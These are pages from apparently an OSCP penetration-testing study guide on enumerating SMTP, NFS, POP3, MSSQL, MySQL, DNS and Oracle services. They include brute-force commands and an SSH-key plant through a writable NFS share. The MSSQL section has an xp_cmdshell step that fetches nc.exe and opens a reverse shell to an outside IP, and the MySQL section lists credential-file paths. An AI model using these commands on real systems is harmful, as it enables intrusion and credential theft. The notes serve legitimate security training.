$ip [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/smtp-enumeration-port-25#user-enumeration) User Enumeration ---------------------------------------------------------------------------------------------------------------------------- Copy smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t $ip for server in $(cat smtpmachines); do echo "******************" $server "*****************"; smtp-user-enum -M VRFY -U userlist.txt -t $server;done #for multiple servers # For multiple servers [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/smtp-enumeration-port-25#connection) Connection ---------------------------------------------------------------------------------------------------------------- Copy telnet $ip 25 ### [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/smtp-enumeration-port-25#command-to-check-if-a-user-exists) Command to check if a user exists Copy VRFY root ### [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/smtp-enumeration-port-25#command-to-ask-the-server-if-a-user-belongs-to-a-mailing-list) Command to ask the server if a user belongs to a mailing list Copy EXPN root [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/smtp-enumeration-port-25#brute-force) Brute Force ------------------------------------------------------------------------------------------------------------------ Copy hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/smtp-enumeration-port-25#send-email-using-netcat) Send email using netcat ------------------------------------------------------------------------------------------------------------------------------------------ [http://www.microhowto.info/howto/send\_an\_email\_using\_netcat.html](http://www.microhowto.info/howto/send_an_email_using_netcat.html) [PreviousNFS Enumeration (Port 111, 2049)](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/nfs-enumeration-port-111-2049) [NextDNS Enumeration (Port 53)](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/dns-enumeration-port-53) Last updated 4 years ago --- # NFS Enumeration (Port 111, 2049) | OSCP Notes [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/nfs-enumeration-port-111-2049#quick-intro) Quick Intro ----------------------------------------------------------------------------------------------------------------------- * Developed in 1984 by Sun Microsystem and similar to SMB because it allows access to files over a network. * Common ports used by NFS are **port 111 and 2049 tcp/udp** * It is a client/server system that allows users to access files across a network and treat them as if they resided in a local file directory. [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/nfs-enumeration-port-111-2049#identifying-if-nfs-is-in-use) Identifying if NFS is in use --------------------------------------------------------------------------------------------------------------------------------------------------------- Copy rpcinfo -p # If you get 111 and 2049 listed , shares are enable and we can mount them [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/nfs-enumeration-port-111-2049#show-all-mounts) Show all mounts ------------------------------------------------------------------------------------------------------------------------------- * if nfs is available, use **showmount** to view available mounting points Copy showmount -e $ip [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/nfs-enumeration-port-111-2049#mount-a-nfs-share) Mount a NFS share ----------------------------------------------------------------------------------------------------------------------------------- * you can then mount the file system with the **mount** command and interact with remote system * first create the directory for mounting - `mkdir /mnt/nfs` Copy mount -t nfs $ip:/share /mnt/nfs [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/nfs-enumeration-port-111-2049#unmounting-the-shares) Unmounting the shares ------------------------------------------------------------------------------------------------------------------------------------------- Copy umount -f -l /mnt/nfs # -f – Force unmount (in case of an unreachable NFS system). (Requires kernel 2.1.116 or later.) # -l – Lazy unmount. Detach the filesystem from the filesystem hierarchy now, and cleanup all references to the filesystem as soon as it is not busy anymore. (Requires kernel 2.4.11 or later.) [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/nfs-enumeration-port-111-2049#permission-denied) Permission Denied ? ------------------------------------------------------------------------------------------------------------------------------------- [![Logo](https://gabb4r.gitbook.io/oscp-notes/~gitbook/image?url=https%3A%2F%2Fblog.christophetd.fr%2Fwp-content%2Fuploads%2F2024%2F06%2Fcropped-V0jaP4f8_400x400-192x192.jpeg&width=20&dpr=4&quality=100&sign=e6c9778f&sv=2)\[Write-up\] Vulnix - playing around with NFS - Christophe Tafani-DereeperChristophe Tafani-Dereeper](https://blog.christophetd.fr/write-up-vulnix/) [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/nfs-enumeration-port-111-2049#further-exploitation) Further Exploitation ----------------------------------------------------------------------------------------------------------------------------------------- * **If you can write to the remote hosts, try to put ssh key there** so that we can get remote ssh without password , Copy ssh keygen # Generating ssh keys cat ~/.ssh/id_rsa.pub >> /mnt/nfs/root/.ssh/authorized_keys # Putting it to remote host ssh root@$ip # Now can login without password on target [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/nfs-enumeration-port-111-2049#nmap-scan-on-rpcbind-and-nfs) Nmap Scan on RPCbind and NFS --------------------------------------------------------------------------------------------------------------------------------------------------------- Copy nmap -v -p 111 10.11.1.1-254 nmap -sV -p 111 --script=rpcinfo 10.11.1.1-254 nmap -p 111 --script nfs* 10.11.1.72 [PreviousSNMP Enumeraion (Port 161)](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/snmp-enumeraion) [NextSMTP Enumeration (Port 25)](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/smtp-enumeration-port-25) Last updated 4 years ago --- # POP3 (Port 110, 25*) | OSCP Notes [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/pop3-port-110-25#quick-intro) Quick Intro ---------------------------------------------------------------------------------------------------------- **Post Office Protocol** (**POP**) is a type of computer networking and Internet standard **protocol** that extracts and retrieves email from a remote mail server for access by the host machine. **POP** is an application layer **protocol** in the OSI model that provides end users the ability to fetch and receive email . The POP clients generally connect, retrieve all messages, store them on the client system, and delete them from the server. There are 3 versions of POP, but POP3 is the most used one. [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/pop3-port-110-25#connection) Connection -------------------------------------------------------------------------------------------------------- Copy telnet $ip 110 [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/pop3-port-110-25#banner-grabbing) Banner Grabbing ------------------------------------------------------------------------------------------------------------------ Copy nc -nv 110 openssl s_client -connect :995 -crlf -quiet ### [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/pop3-port-110-25#manual) Manual You can use the command `CAPA` to obtain the capabilities of the POP3 server. ### [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/pop3-port-110-25#automated) Automated Copy nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -port #All are default scripts The `pop3-ntlm-info` plugin will return some "**sensitive**" data (Windows versions). [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/pop3-port-110-25#command) Command -------------------------------------------------------------------------------------------------- Copy POP commands: USER uid Log in as "uid" PASS password Substitue "password" for your actual password STAT List number of messages, total mailbox size LIST List messages and sizes RETR n Show message n DELE n Mark message n for deletion RSET Undo any changes QUIT Logout (expunges messages if no RSET) TOP msg n Show first n lines of message number msg CAPA Get capabilities ### [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/pop3-port-110-25#example) Example Copy root@kali:~# telnet $ip 110 +OK beta POP3 server (JAMES POP3 Server 2.3.2) ready USER billydean +OK PASS password +OK Welcome billydean list +OK 2 1807 1 786 2 1021 retr 1 +OK Message follows From: jamesbrown@motown.com Dear Billy Dean, Here is your login for remote desktop ... try not to forget it this time! username: billydean password: PA$$W0RD!Z [PreviousDNS Enumeration (Port 53)](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/dns-enumeration-port-53) [NextMySQL (Port 3306)](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/mysql-port-3306) Last updated 4 years ago --- # MsSQL (Port 1433) | OSCP Notes [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/mssql-port-1433#quick-intro) Quick Intro --------------------------------------------------------------------------------------------------------- **Microsoft SQL Server** is a [relational database management system](https://en.wikipedia.org/wiki/Relational_database_management_system) developed by [Microsoft](https://en.wikipedia.org/wiki/Microsoft) . As a [database server](https://en.wikipedia.org/wiki/Database_server) , it is a [software product](https://en.wikipedia.org/wiki/Software_product) with the primary function of storing and retrieving data as requested by other [software applications](https://en.wikipedia.org/wiki/Software_application) —which may run either on the same computer or on another computer across a network (including the Internet). [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/mssql-port-1433#nmap-scripts) Nmap Scripts ----------------------------------------------------------------------------------------------------------- Copy nmap -n -v -sV -Pn -p 1433 –script ms-sql-info,ms-sql-ntlm-info,ms-sql-empty-password $ip [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/mssql-port-1433#bruteforce) BruteForce ------------------------------------------------------------------------------------------------------- Copy nmap -n -v -sV -Pn -p 1433 –script ms-sql-brute –script-args userdb=users.txt,passdb=passwords.txt $ip [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/mssql-port-1433#rce-with-sql-server) RCE with SQL Server ------------------------------------------------------------------------------------------------------------------------- * We can use `mssql.py` to login and execute the commands Copy mssqlclient.py /:@$ip mssqlclient.py bathry/admin:pss123@192.168.11.15 * Enabled Code execution * Copied the Nishang reverse shell to current directory and added localhost and port to it and start hosting server Copy SQL> enable_xp_cmdshell SQL> xp_cmdshell copy \\10.10.16.26\gabbar\nc.exe %temp%\nc.exe SQL> xp_cmdshell %temp%/nc.exe -e cmd.exe 10.10.16.26 4444 [PreviousOracle (Port 1521)](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/oracle-port-152) [NextWeb Scanning](https://gabb4r.gitbook.io/oscp-notes/web-http/automated-scanners) Last updated 4 years ago --- # MySQL (Port 3306) | OSCP Notes [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/mysql-port-3306#nmap) Nmap ------------------------------------------------------------------------------------------- Copy nmap -sV -Pn -vv --script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $ip -p 3306 nmap -sV -Pn -vv -script=mysql* $ip -p 3306 [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/mysql-port-3306#local-access) Local Access ----------------------------------------------------------------------------------------------------------- if you gain access to target box and see mysql running , you can try to connect with it from target locally Copy mysql -u root # Connect to root without password mysql -u root -p # A password will be asked # Always test root:root credential [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/mysql-port-3306#remote-access) Remote Access ------------------------------------------------------------------------------------------------------------- Copy mysql -h -u root mysql -h -u root@localhost [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/mysql-port-3306#if-running-as-root) If running as root ----------------------------------------------------------------------------------------------------------------------- If Mysql is running as root and you have acces, you can run commands: Copy mysql> select do_system('id'); mysql> \! sh [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/mysql-port-3306#getting-all-the-information-from-inside-the-database) Getting all the information from inside the database ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Copy mysqldump -u admin -p admin --all-databases --skip-lock-tables [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/mysql-port-3306#post-enumeration) Post Enumeration ------------------------------------------------------------------------------------------------------------------- Here are list of some files to check after shell on target system to get some credentials or some juicy information that help to get root easily ### [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/mysql-port-3306#mysql-server-configuration-file) MySQL server configuration file * Unix Copy my.cnf /etc/mysql /etc/my.cnf /etc/mysql/my.cnf /var/lib/mysql/my.cnf ~/.my.cnf /etc/my.cnf * Windows Copy config.ini my.ini windows\my.ini winnt\my.ini /mysql/data/ ### [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/mysql-port-3306#command-history) Command History Copy ~/.mysql.history ### [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/mysql-port-3306#log-files) Log Files Copy connections.log update.log common.log ### [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/mysql-port-3306#finding-passwords-to-mysql) Finding passwords to MySQL * You might gain access to a shell by uploading a reverse-shell. And then you need to escalate your privilege. * Look into the database and see what users and passwords that are available. Copy /var/www/html/configuration.php [PreviousPOP3 (Port 110, 25\*)](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/pop3-port-110-25) [NextOracle (Port 1521)](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/oracle-port-152) Last updated 4 years ago --- # DNS Enumeration (Port 53) | OSCP Notes [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/dns-enumeration-port-53#quick-intro) Quick Intro ----------------------------------------------------------------------------------------------------------------- * DNS enumeration is the process of identifying the DNS servers and the corresponding DNS records. DNS stands for Domain Name System which is a database containing information about domain names and their corresponding IP addresses. The DNS system is responsible for translating human-readable hostnames into machine-readable IP addresses. The most important records to look for in DNS enumeration are the: * A (address) records containing the IP address of the domain. * MX records, which stands for Mail Exchange, contain the mail exchange servers. * CNAME records used for aliasing domains. CNAME stands for Canonical Name and links any sub-domains with existing domain DNS records. * NS records, which stands for Name Server, indicates the authoritative (or main) name server for the domain. * SOA records, which stands for State of Authority, contain important information about the domain such as the primary name server, a timestamp showing when the domain was last updated and the party responsible for the domain. * PTR or Pointer Records map an IPv4 address to the CNAME on the host. This record is also called a ‘reverse record’ because it connects a record with an IP address to a hostname instead of the other way around. * TXT records contain text inserted by the administrator (such as notes about the way the network has been configured). * The information retrieved during DNS enumeration will consist of details about names servers and IP addresses of potential targets (such as mail servers, sub-domains etc). Some tools used for DNS enumeration included with Kali Linux are: **whois, nslookup, dig, host and automated tools like Fierce, DNSenum and DNSrecon.** Let’s briefly review these tools and see how we can use them for DNS enumeration. ![](https://gabb4r.gitbook.io/oscp-notes/~gitbook/image?url=https%3A%2F%2F3331885100-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-legacy-files%2Fo%2Fassets%252F-MkfTlo0T97eXbWuX_cT%252F-MkgjSlLxvnvt7wiBGVG%252F-MkgsRBOFP_jtaMvh_sX%252Fimage.png%3Falt%3Dmedia%26token%3Dcddc213f-e643-4118-b522-af9d9d12f7ab&width=768&dpr=4&quality=100&sign=b829c465&sv=2) general overview of different records [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/dns-enumeration-port-53#whois) Whois ----------------------------------------------------------------------------------------------------- Copy whois [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/dns-enumeration-port-53#nmap) Nmap --------------------------------------------------------------------------------------------------- Copy nmap -sC -sV -p53 $ip/24 nmap -p 80 --script dns-brute.nse domain.com # Find DNS (A) records by trying a list of common sub-domains from a wordlist. nmap $ip --script=dns-zone-transfer -p 53 # Zone transfer script [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/dns-enumeration-port-53#host) Host --------------------------------------------------------------------------------------------------- ### [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/dns-enumeration-port-53#domain-scan) Domain scan Copy $ host google.com google.com has address 142.250.183.78 google.com has IPv6 address 2404:6800:4009:822::200e google.com mail is handled by 20 alt1.aspmx.l.google.com. google.com mail is handled by 10 aspmx.l.google.com. google.com mail is handled by 50 alt4.aspmx.l.google.com. google.com mail is handled by 40 alt3.aspmx.l.google.com. google.com mail is handled by 30 alt2.aspmx.l.google.com. ### [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/dns-enumeration-port-53#find-particular-records) Find particular records Copy host -t mx google.com # Return mail servers host -t ns google.com # Return name servers host -t txt google.com # Return txt records ### [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/dns-enumeration-port-53#reverse-domain-lookup) Reverse Domain Lookup Copy $ host gnu.org gnu.org has address 209.51.188.148 gnu.org has IPv6 address 2001:470:142:3::a gnu.org mail is handled by 10 eggs.gnu.org. $ host 209.51.188.148 148.188.51.209.in-addr.arpa is an alias for 148.0-24.188.51.209.in-addr.arpa. 148.0-24.188.51.209.in-addr.arpa domain name pointer wildebeest.gnu.org. ### [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/dns-enumeration-port-53#dns-zone-transfer) DNS Zone Transfer DNS zone transfer, also known as DNS query type AXFR, is a process by which a DNS server passes a copy of part of its database to another DNS server. The portion of the database that is replicated is known as a zone. Copy host -l Copy $ host -t ns zonetransfer.me # first list out their name servers to check for zone transfer zonetransfer.me name server nsztm2.digi.ninja. zonetransfer.me name server nsztm1.digi.ninja. $ host -l zonetransfer.me nsztm1.digi.ninja Using domain server: Name: nsztm1.digi.ninja Address: 81.4.108.41#53 Aliases: zonetransfer.me has address 5.196.105.14 zonetransfer.me name server nsztm1.digi.ninja. zonetransfer.me name server nsztm2.digi.ninja. 14.105.196.5.IN-ADDR.ARPA.zonetransfer.me domain name pointer www.zonetransfer.me. asfdbbox.zonetransfer.me has address 127.0.0.1 canberra-office.zonetransfer.me has address 202.14.81.230 dc-office.zonetransfer.me has address 143.228.181.132 deadbeef.zonetransfer.me has IPv6 address dead:beaf:: email.zonetransfer.me has address 74.125.206.26 home.zonetransfer.me has address 127.0.0.1 internal.zonetransfer.me name server intns1.zonetransfer.me. internal.zonetransfer.me name server intns2.zonetransfer.me. intns1.zonetransfer.me has address 81.4.108.41 intns2.zonetransfer.me has address 167.88.42.94 office.zonetransfer.me has address 4.23.39.254 ipv6actnow.org.zonetransfer.me has IPv6 address 2001:67c:2e8:11::c100:1332 owa.zonetransfer.me has address 207.46.197.32 alltcpportsopen.firewall.test.zonetransfer.me has address 127.0.0.1 vpn.zonetransfer.me has address 174.36.59.154 www.zonetransfer.me has address 5.196.105.14 ### [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/dns-enumeration-port-53#zone-transfer-script) Zone Transfer Script Copy #!/bin/bash # Simple Zone Transfer Bash Script # $1 is the first argument given after the bash script # Check if argument was given, if not, print usage if [ -z "$1" ]; then echo "[*] Simple Zone transfer script" echo "[*] Usage : $0 " exit 0 fi # if argument was given, identify the DNS servers for the domain for server in $(host -t ns $1 | cut -d " " -f4); do # For each of these servers, attempt a zone transfer host -l $1 $server |grep "has address" done ### [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/dns-enumeration-port-53#subdomain-bruteforcing-using-common-hostname) Subdomain bruteforcing using common hostname Copy for ip in $(cat list.txt); do host $ip.website.com; done ### [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/dns-enumeration-port-53#reverse-dns-lookup-bruteforcing) Reverse dns lookup bruteforcing Copy for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found" The ip is based on subdomain bruteforcing result [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/dns-enumeration-port-53#nslookup) Nslookup ----------------------------------------------------------------------------------------------------------- * nslookup is used to query Internet name servers interactively Copy $ nslookup hsploit.com Server: 203.153.41.28 Address: 203.153.41.28#53 Non-authoritative answer: Name: hsploit.com Address: 104.21.38.165 Name: hsploit.com Address: 172.67.136.119 Name: hsploit.com Address: 2606:4700:3033::6815:26a5 Name: hsploit.com Address: 2606:4700:3035::ac43:8877 ### [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/dns-enumeration-port-53#running-in-intrective-mode) Running in intrective mode Copy $ nslookup > set type=ns > hsploit.com Server: 203.153.41.28 Address: 203.153.41.28#53 Non-authoritative answer: hsploit.com nameserver = dee.ns.cloudflare.com. hsploit.com nameserver = jim.ns.cloudflare.com. Authoritative answers can be found from: > ### [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/dns-enumeration-port-53#gathering-information-from-specific-dns-server) Gathering information from specific DNS server Copy $ nslookup > server 10.10.10.13 Default server: 10.10.10.13 Address: 10.10.10.13#53 > 10.10.10.13 13.10.10.10.in-addr.arpa name = ns1.cronos.htb. [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/dns-enumeration-port-53#dig) Dig ------------------------------------------------------------------------------------------------- ### [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/dns-enumeration-port-53#domain-scan-1) Domain scan Copy $ dig hsploit.com ; <<>> DiG 9.16.18 <<>> hsploit.com ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 13539 ;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 1472 ;; QUESTION SECTION: ;hsploit.com. IN A ;; ANSWER SECTION: hsploit.com. 1200 IN A 104.21.38.165 hsploit.com. 1200 IN A 172.67.136.119 ;; Query time: 139 msec ;; SERVER: 203.153.41.28#53(203.153.41.28) ;; WHEN: Thu Jul 22 17:04:58 IST 2021 ;; MSG SIZE rcvd: 72 ### [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/dns-enumeration-port-53#asking-for-particular-records) Asking for particular records Copy dig hsploit.com -t mx ### [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/dns-enumeration-port-53#sorting-the-output) Sorting the output Copy $ dig hsploit.com -t ns +short dee.ns.cloudflare.com. jim.ns.cloudflare.com. Note - if particular type of information is not available , dig will **give no output** so don't think at that time that tool is not working xD ### [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/dns-enumeration-port-53#reverse-domain-lookup-1) Reverse Domain Lookup Copy $ dig -x 142.250.183.78 +short bom12s12-in-f14.1e100.net. ### [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/dns-enumeration-port-53#zone-transfer) Zone Transfer Copy $ dig zonetransfer.me ns +short nsztm2.digi.ninja. nsztm1.digi.ninja. $ dig axfr zonetransfer.me @nsztm1.digi.ninja ; <<>> DiG 9.16.18 <<>> axfr zonetransfer.me @nsztm1.digi.ninja ;; global options: +cmd zonetransfer.me. 7200 IN SOA nsztm1.digi.ninja. robin.digi.ninja. 2019100801 172800 900 1209600 3600 zonetransfer.me. 300 IN HINFO "Casio fx-700G" "Windows XP" zonetransfer.me. 301 IN TXT "google-site-verification=tyP28J7JAUHA9fw2sHXMgcCC0I6XBmmoVi04VlMewxA" zonetransfer.me. 7200 IN MX 0 ASPMX.L.GOOGLE.COM. zonetransfer.me. 7200 IN MX 10 ALT1.ASPMX.L.GOOGLE.COM. zonetransfer.me. 7200 IN MX 10 ALT2.ASPMX.L.GOOGLE.COM. zonetransfer.me. 7200 IN MX 20 ASPMX2.GOOGLEMAIL.COM. zonetransfer.me. 7200 IN MX 20 ASPMX3.GOOGLEMAIL.COM. zonetransfer.me. 7200 IN MX 20 ASPMX4.GOOGLEMAIL.COM. zonetransfer.me. 7200 IN MX 20 ASPMX5.GOOGLEMAIL.COM. zonetransfer.me. 7200 IN A 5.196.105.14 zonetransfer.me. 7200 IN NS nsztm1.digi.ninja. zonetransfer.me. 7200 IN NS nsztm2.digi.ninja. _acme-challenge.zonetransfer.me. 301 IN TXT "6Oa05hbUJ9xSsvYy7pApQvwCUSSGgxvrbdizjePEsZI" _sip._tcp.zonetransfer.me. 14000 IN SRV 0 0 5060 www.zonetransfer.me. 14.105.196.5.IN-ADDR.ARPA.zonetransfer.me. 7200 IN PTR www.zonetransfer.me. asfdbauthdns.zonetransfer.me. 7900 IN AFSDB 1 asfdbbox.zonetransfer.me. asfdbbox.zonetransfer.me. 7200 IN A 127.0.0.1 asfdbvolume.zonetransfer.me. 7800 IN AFSDB 1 asfdbbox.zonetransfer.me. canberra-office.zonetransfer.me. 7200 IN A 202.14.81.230 cmdexec.zonetransfer.me. 300 IN TXT "; ls" contact.zonetransfer.me. 2592000 IN TXT "Remember to call or email Pippa on +44 123 4567890 or pippa@zonetransfer.me when making DNS changes" dc-office.zonetransfer.me. 7200 IN A 143.228.181.132 deadbeef.zonetransfer.me. 7201 IN AAAA dead:beaf:: dr.zonetransfer.me. 300 IN LOC 53 20 56.558 N 1 38 33.526 W 0.00m 1m 10000m 10m DZC.zonetransfer.me. 7200 IN TXT "AbCdEfG" email.zonetransfer.me. 2222 IN NAPTR 1 1 "P" "E2U+email" "" email.zonetransfer.me.zonetransfer.me. email.zonetransfer.me. 7200 IN A 74.125.206.26 Hello.zonetransfer.me. 7200 IN TXT "Hi to Josh and all his class" home.zonetransfer.me. 7200 IN A 127.0.0.1 Info.zonetransfer.me. 7200 IN TXT "ZoneTransfer.me service provided by Robin Wood - robin@digi.ninja. See http://digi.ninja/projects/zonetransferme.php for more information." internal.zonetransfer.me. 300 IN NS intns1.zonetransfer.me. internal.zonetransfer.me. 300 IN NS intns2.zonetransfer.me. intns1.zonetransfer.me. 300 IN A 81.4.108.41 intns2.zonetransfer.me. 300 IN A 167.88.42.94 office.zonetransfer.me. 7200 IN A 4.23.39.254 ipv6actnow.org.zonetransfer.me. 7200 IN AAAA 2001:67c:2e8:11::c100:1332 owa.zonetransfer.me. 7200 IN A 207.46.197.32 robinwood.zonetransfer.me. 302 IN TXT "Robin Wood" rp.zonetransfer.me. 321 IN RP robin.zonetransfer.me. robinwood.zonetransfer.me. sip.zonetransfer.me. 3333 IN NAPTR 2 3 "P" "E2U+sip" "!^.*$!sip:customer-service@zonetransfer.me!" . sqli.zonetransfer.me. 300 IN TXT "' or 1=1 --" sshock.zonetransfer.me. 7200 IN TXT "() { :]}; echo ShellShocked" staging.zonetransfer.me. 7200 IN CNAME www.sydneyoperahouse.com. alltcpportsopen.firewall.test.zonetransfer.me. 301 IN A 127.0.0.1 testing.zonetransfer.me. 301 IN CNAME www.zonetransfer.me. vpn.zonetransfer.me. 4000 IN A 174.36.59.154 www.zonetransfer.me. 7200 IN A 5.196.105.14 xss.zonetransfer.me. 300 IN TXT "'>" zonetransfer.me. 7200 IN SOA nsztm1.digi.ninja. robin.digi.ninja. 2019100801 172800 900 1209600 3600 ;; Query time: 133 msec ;; SERVER: 81.4.108.41#53(81.4.108.41) ;; WHEN: Thu Jul 22 17:28:02 IST 2021 ;; XFR size: 50 records (messages 1, bytes 1994) [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/dns-enumeration-port-53#automated-scanners) Automated Scanners ------------------------------------------------------------------------------------------------------------------------------- ### [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/dns-enumeration-port-53#fierce) Fierce Copy fierce --domain google.com ### [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/dns-enumeration-port-53#dnsenum) Dnsenum Copy dnsenum $ip dnsenum google.com -f /usr/share/dnsenum/dns.txt # Brute forcing subdomains ### [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/dns-enumeration-port-53#dnsrecon) DnsRecon Copy dnsrecon -d $ip dnsrecon -d $ip -t axfr # Perform zone transfer dnsrecon -d $ip -D /usr/share/dnsrecon/subdomains-top1mil-20000.txt -t brt # Perform host and subdomain brute force [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/dns-enumeration-port-53#sub-domain-enumeration) Sub-Domain Enumeration --------------------------------------------------------------------------------------------------------------------------------------- ### [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/dns-enumeration-port-53#ffuf) Ffuf Copy ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.horizontall.htb" -u http://horizontall.htb ### [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/dns-enumeration-port-53#sublist3r) Sublist3r Copy sublist3r -d # To scan with public data sublist3r -d -b -t 100 # To bruteforce the subdomains # this will use following wordlist: /usr/share/sublist3r/subbrute/names.txt [PreviousSMTP Enumeration (Port 25)](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/smtp-enumeration-port-25) [NextPOP3 (Port 110, 25\*)](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/pop3-port-110-25) Last updated 4 years ago --- # Oracle (Port 1521) | OSCP Notes [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/oracle-port-152#quick-intro) Quick Intro --------------------------------------------------------------------------------------------------------- Oracle database (Oracle DB) is a relational database management system (RDBMS) from the Oracle Corporation (from [here](https://www.techopedia.com/definition/8711/oracle-database) ). When enumerating Oracle the first step is to talk to the TNS-Listener that usually resides on the default port (1521/TCP, -you may also get secondary listeners on 1522–1529-). [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/oracle-port-152#nmap-script) Nmap Script --------------------------------------------------------------------------------------------------------- Copy nmap -p 1521 -A $ip nmap -n -v -sV -Pn -p 1521 –script=oracle-enum-users –script-args sid=ORCL,userdb=users.txt $ip nmap --script "oracle-tns-version" -p 1521 -T4 -sV # TNS listener version nmap --script=oracle-sid-brute $ip nmap -n -v -sV -Pn -p 1521 --script=oracle-brute $ip # Brute-Force Account [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/oracle-port-152#oscanner) oscanner --------------------------------------------------------------------------------------------------- Copy oscanner -s $ip -P 1521 [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/oracle-port-152#fingerprint-oracle-tns) Fingerprint oracle tns ------------------------------------------------------------------------------------------------------------------------------- tnscmd10g = A tool to prod the oracle tnslsnr process Copy tnscmd10g version -h 192.168.1.101 tnscmd10g status -h 192.168.1.101 Other useful TNS listener commands: **Command** **Purpose** ping Ping the listener version Provide output of the listener version and platform information status Return the current status and variables used by the listener services Dump service data debug Dump debugging information to the listener log reload Reload the listener configuration file save\_config Write the listener configuration file to a backup location stop Invoke listener shutdown If you **receive an error**, could be because **TNS versions are incompatible** (Use the `--10G` parameter with `tnscmd10`) and if the **error persist,** the listener may be **password protected** (you can see a list were all the [**errors are detailed here**](https://docs.oracle.com/database/121/ERRMG/TNS-00000.htm#ERRMG-GUID-D723D931-ECBA-4FA4-BF1B-1F4FE2EEBAD7) ) — don't worry… hydra to the rescue**:** Copy hydra -P rockyou.txt -t 32 -s 1521 host.victim oracle-listener [PreviousMySQL (Port 3306)](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/mysql-port-3306) [NextMsSQL (Port 1433)](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/mssql-port-1433) Last updated 4 years ago --- # Directory Fuzzing | OSCP Notes [](https://gabb4r.gitbook.io/oscp-notes/web-http/directory-fuzzing#ffuf) Ffuf ---------------------------------------------------------------------------------- ### [](https://gabb4r.gitbook.io/oscp-notes/web-http/directory-fuzzing#simple-scan) Simple Scan Copy ffuf -w /opt/dirsearch/small.txt -u http://10.10.118.46/FUZZ 